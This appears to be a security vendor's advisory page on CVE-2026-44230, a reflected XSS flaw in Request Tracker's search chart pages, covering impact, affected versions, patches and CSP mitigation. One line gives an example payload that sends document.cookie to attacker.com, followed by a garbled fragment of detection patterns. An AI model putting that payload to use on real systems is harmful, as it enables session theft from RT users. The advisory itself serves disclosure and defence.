
PEACH
Un cadre d’isolation des locataires
CVE-2026-44230 is a reflected Cross-Site Scripting (XSS) vulnerability in Best Practical's RT (Request Tracker), an open-source enterprise issue and ticket tracking system. The vulnerability affects RT versions 5.0.4 up to (but not including) 5.0.10, and 6.0.0 up to (but not including) 6.0.3, specifically in the search results chart pages. It was published on May 20, 2026, and fixed in versions 5.0.10 and 6.0.3. The CVSS v3.1 base score is 6.1 (Medium) (GitHub Advisory, Red Hat Bugzilla).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and stems from insufficient sanitization of user-controlled URL parameters on search results chart pages in RT (GitHub Advisory). An attacker crafts a malicious URL containing an injected JavaScript payload that, when reflected back in the browser response without proper encoding, executes in the victim's browser context. Exploitation requires no privileges on the attacker's part but does require user interaction — specifically, an authenticated RT user must be induced to visit the crafted URL (GitHub Advisory). No public proof-of-concept exploit code has been identified at this time.
Successful exploitation allows an attacker to execute arbitrary JavaScript within the browser session of an authenticated RT user, potentially enabling session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, or exfiltration of sensitive ticket and user data visible in the RT interface (GitHub Advisory). The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the user's browser environment. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-impact per the CVSS scoring (Red Hat Bugzilla).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent encoded form.%3Cscript%3E, javascript:, onerror=, onload=) in query string parameters.Best Practical has released patched versions that resolve this vulnerability: RT 5.0.10 for the 5.0.x branch and RT 6.0.3 for the 6.0.x branch. All users running affected versions should upgrade immediately (GitHub Advisory, RT 6.0.3 Release). No effective configuration-based workarounds exist; the advisory recommends avoiding following untrusted RT URLs as a precautionary measure. Additionally, deploying Content Security Policy (CSP) headers to restrict inline script execution can reduce the impact of XSS vulnerabilities as a defense-in-depth measure.
The vulnerability was reported by the RT maintainers (cbrandtbuffalo) via GitHub Security Advisories and is one of several security issues addressed in the RT 6.0.3 and 5.0.10 releases, which also fixed SQL injection, LDAP authentication bypass, CSRF, and other XSS variants (RT 6.0.3 Release). The Ubuntu security team issued advisory USN-8506-1 covering this and related RT vulnerabilities. Coverage has been limited to vulnerability tracking databases and Linux distribution security channels, with no notable broader media or social media discussion identified.
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."